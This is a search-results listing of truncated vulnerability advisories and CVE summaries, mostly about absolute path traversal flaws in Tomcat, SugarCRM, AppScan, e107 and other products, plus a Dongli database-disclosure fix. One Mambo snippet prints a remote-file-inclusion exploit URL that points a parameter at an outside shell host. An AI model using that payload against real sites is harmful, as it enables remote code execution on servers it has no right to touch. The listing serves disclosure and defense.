2042 matches found
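Dongli (My Power) database disclosure vulnerability
Entering the address of the Dongli system's conn.asp directly, e.g. "http://www.asp163.net/inc/conn.asp", exposes the real path and file name of the database in the script error message, so the database can be downloaded. Dongli My Power 3.5X ACCESS/SQL edition. Step 1: change the database's extension to ".asp" or ".asa"; we have already applied anti-download handling in the database. After renaming, even if someone knows the database's real path and file name, they cannot download it. Step 2: modify the database address on line 5 of conn.asp and connuser.asp, changing the relative address originally used to an absolute address. For example, the original line reads: db=...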
FreeBSD Ports: coppermine
The remote host is missing an update to the system as announced in the referenced advisory. SPDX-FileCopyrightText: 2008 E-Soft Inc. Some text descriptions might be excerpted from referenced sources, and are Copyright (C) by the respective right holders. SPDX-License-Identifier: GPL-2.0-only...
Absolute path traversal Apache Tomcat WEBDAV
Absolute path traversal vulnerability in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0, 5.0.0, 5.5.0 through 5.5.25, and 6.0.0 through 6.0.14, under certain configurations, allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag...
Path traversal
Absolute path traversal vulnerability in fckeditor/editor/filemanager/browser/default/connectors/php/connector.php in UNAK-CMS 1.5.5 allows remote attackers to include and execute arbitrary local files via a full pathname in the Dirroot parameter, a different vulnerability than CVE-2006-4890.1...
Mambo 4.6.4 - 'Output.php' Remote File Inclusion
vuln.: Mambo 12 / 13 14 requireonce$mosConfigabsolutepath . '/includes/Cache/Lite.php'; ... ^ no comment.. RFI in line 14.. exploit: http://host/path/includes/Cache/Lite/Output.php?mosConfigabsolutepath=http://shell...
CVE-2008-2045
Absolute path traversal vulnerability in SugarCRM Sugar Community Edition 4.5.1 and 5.0.0 allows remote attackers to read arbitrary files via a full path in the URL parameter to modules/Feeds/Feed.php, which places the contents into a related cache file in the .cache/feeds directory...
Path traversal
Multiple absolute path traversal vulnerabilities in certain ActiveX controls in WatchFire AppScan 7.0 allow remote attackers to create or overwrite arbitrary files via a full pathname in the argument to the (1) CompactSave and (2) SaveSession method in one control, and the (3) saveRecordedExploreToFile...
CVE-2008-2015
Multiple absolute path traversal vulnerabilities in certain ActiveX controls in WatchFire AppScan 7.0 allow remote attackers to create or overwrite arbitrary files via a full pathname in the argument to the (1) CompactSave and (2) SaveSession method in one control, and the (3) saveRecordedExploreToFile...
CVE-2008-2015
CVE-2008-2015 affects WatchFire AppScan 7.0 ActiveX controls. The vulnerability is multiple absolute path traversal via full pathnames passed to the CompactSave, SaveSession, and saveRecordedExploreToFile methods in different controls, enabling remote creation/overwriting of arbitrary files and p...
CVE-2008-1933
The CVE-2008-1933 entry describes an absolute path traversal in a Zune ActiveX control, allowing user‑assisted remote attackers to overwrite arbitrary files via the SaveToFile method. The vulnerability requires the user to explicitly allow code execution. Affected component is an ActiveX control ...
Tomcat: Multiple vulnerabilities
Background: Tomcat is the Apache Jakarta Project's official implementation of Java Servlets and Java Server Pages. Description: The following vulnerabilities were reported: Delian Krustev discovered that the JULI logging component does not properly enforce access restrictions, allowing web...
Path traversal
Absolute path traversal vulnerability in dload.php in the mygallery 2.3 plugin for e107 allows remote attackers to obtain sensitive information via a full pathname in the file parameter. NOTE: some of these details are obtained from third party information...
CVE-2008-1702
Absolute path traversal vulnerability in dload.php in the mygallery 2.3 plugin for e107 allows remote attackers to obtain sensitive information via a full pathname in the file parameter. NOTE: some of these details are obtained from third party information...
Path traversal
Absolute path traversal vulnerability in install/index.php in Drake CMS 0.4.11 RC8 allows remote attackers to read and execute arbitrary files via a full pathname in the d_root parameter. NOTE: the provenance of this information is unknown; the details are obtained solely from third party...
CVE-2008-1371
CVE-2008-1371 affects Drake CMS 0.4.11 RC8 via an absolute path traversal in install/index.php, exploitable through a full pathname supplied in the d_root parameter. This allows remote attackers to read and execute arbitrary files. The description notes provenance as third-party information; no r...
Path traversal
Absolute path traversal vulnerability in system/workplace/admin/workplace/logfileview/logfileViewSettings.jsp in Alkacon OpenCms 7.0.3 and 7.0.4 allows remote authenticated administrators to read arbitrary files via a full pathname in the filePath.0 parameter...
CVE-2008-1221
Absolute path traversal vulnerability in the FTP server in MicroWorld eScan Corporate Edition 9.0.742.98 and eScan Management Console (aka eScan Server) 9.0.742.1 allows remote attackers to read arbitrary files via an absolute pathname in the RETR (get) command...
CVE-2008-1221
CVE-2008-1221 describes an absolute path traversal in the FTP server of MicroWorld eScan Corporate Edition 9.0.742.98 and eScan Management Console (eScan Server) 9.0.742.1. The vulnerability allows a remote attacker to read arbitrary files via an absolute pathname in the RETR (get) command. Affec...